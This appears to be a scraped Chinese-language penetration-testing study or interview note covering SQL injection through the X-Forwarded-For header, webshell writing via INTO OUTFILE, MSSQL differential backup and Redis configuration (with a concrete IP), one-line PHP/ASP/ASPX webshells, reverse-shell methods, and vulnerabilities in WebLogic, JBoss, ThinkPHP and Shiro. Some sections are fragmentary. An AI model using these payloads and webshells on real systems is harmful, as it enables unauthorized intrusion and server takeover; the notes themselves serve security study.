赞
踩
主动收集
直接在目标网站上收集信息,进行扫描,操作等,有流量经过就是主动收集
被动收集
基于公开渠道,搜索引擎等,不予目标系统之间交互,而获得信息,尽量避免留下痕迹的方式。
在HTTP 的HEAD中存在X-Forwarded-for参数的调用
使用前提:X-Forword-For的值是*,那么就可以输入SQL语句来代替
X-Forwarded-For:127.0.0.1’,updatexml(1,concat(0x7e,(select user()) ,0x7e),1)) #
是根据数据库中的:information_schema这个数据库获取的,里面存放着维护其他数据库和表的信息。
以此来获取数据库的所有信息。
这个的话具体问题,具体分析吧,如果注入点在password的话
第一种优先级最高,最快速,但需要具体情况具体分析。
d=1' and 1=2 union select 1,2,'shell内容' into outfile "/www//site//shell.php" %23
前提条件:
实现原理:
完整备份后,再对数据库进行修改,差异备份会记录最后的LSN,将shell写入数据库,备份asp即可getshell
完整备份
backup database 库名 to disk =
'c:\ddd.bak';--
创建表并插入数据
create table [dbo].[dtest] ([cmd]
[image]);--
insert into dtest(cmd)
values(0x3C25657865637574652872657175657374282261222929253E);--
x3C25657865637574652872657175657374282261222929253E,这就是小马内容:<%execute(request(“a”))%>
进行差异备份
backup
database 库名 to disk='目标位置\d.asp' WITH
DIFFERENTIAL,FORMAT;--
如果是get类型,就直接使用-u参数
如果是post类型,还要添加–data=post参数来指定请求方式
head注入的话,用-r参数请求数据包的文件地址
当然在post或者header注入时,可以在注入点后添加*号,来标记注入点
php一句话木马:
<?php @eval($_POST[value]);?>
asp一句话木马:
<%eval request("value")%>
aspx一句话木马:
<%@ Page Language="Jscript"%><%eval(Request.Item["value"])%>
区别:
NC方式
主要就是,一方nc -lvvp开启端口监听,另一方连接端口即可,根据开启的主次不同来区分shell正反
Bash方式
Per方式,msf中有payload使用
Curl方式
Telnet端口转发的方式
openSSL,反弹443端口,流量加密
还有其他python,msf的一些payload方法
产生原因:
漏洞利用
写入webshell
要知道网站绝对路径,目录有写入权限才行(这一步可以使用目录扫描工具去发现)
redis-cli -h 122.114.225.148 -p 6379
config set dir /var/www/html
config set dbfilename shell.php
set x "<?php @eval($_POST['cmd']);?>"
save
写入SSH公钥(存放路径/root/.ssh/)
写定时任务反弹shell
主从复制RCE(攻击脚本)
weblogic是javaEE中间件,用于开发、集成、部署、管理、网络、数据库应用的java应用服务器
端口:7001
后台:/console
漏洞
jboss一个基于j2ee的开发源代码的应用服务器,专门运行javaEE程序。
漏洞
webUI界面未授权访问漏洞
administration Console弱口令
/jxm-console/htmlAdaptor路径对外开发,未身份验证设置,导致未授权访问漏洞
利用原理:使用后台jboos.admin>DeploymentFileRepository>store()方法,上传shell,方法中的四个参数
此方法会将这些参数拼接起来
还可以使用GET或者POST中的HEAD来进行绕过请求
反序列化漏洞
jave Web应用开源的MVC开发框架,本质上是servlet。
漏洞发现
通过发现版本后,查询历史漏洞,利用POC即可
漏洞
还有很多历史漏洞,就说一种吧
php开发框架,很多cms基于Thinkphp二次开发的
漏洞:
有很多POC,大都时通过url写入webshell
json解释器,java Bean转字符串,字符串反序列化java Bean
java安全框架,身份认证、授权、加密、会话管理
判断是否使用shiro
漏洞
反序列化远程代码执行漏洞
Shiro-550反序列化远程代码执行漏洞原因
框架提供了一个RemberMe功能,浏览器关闭,下次登录就无需再次输入账号密码,认证的身份信息存放在Cookie中,shiro则通过ASE对称加密算法对Cookie进行解密来获取身份信息,而ASE的密钥是硬编码在里面,密钥泄露,那么就可以伪造身份走通流程。
攻击者通过以下流程构造攻击
攻击命令
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。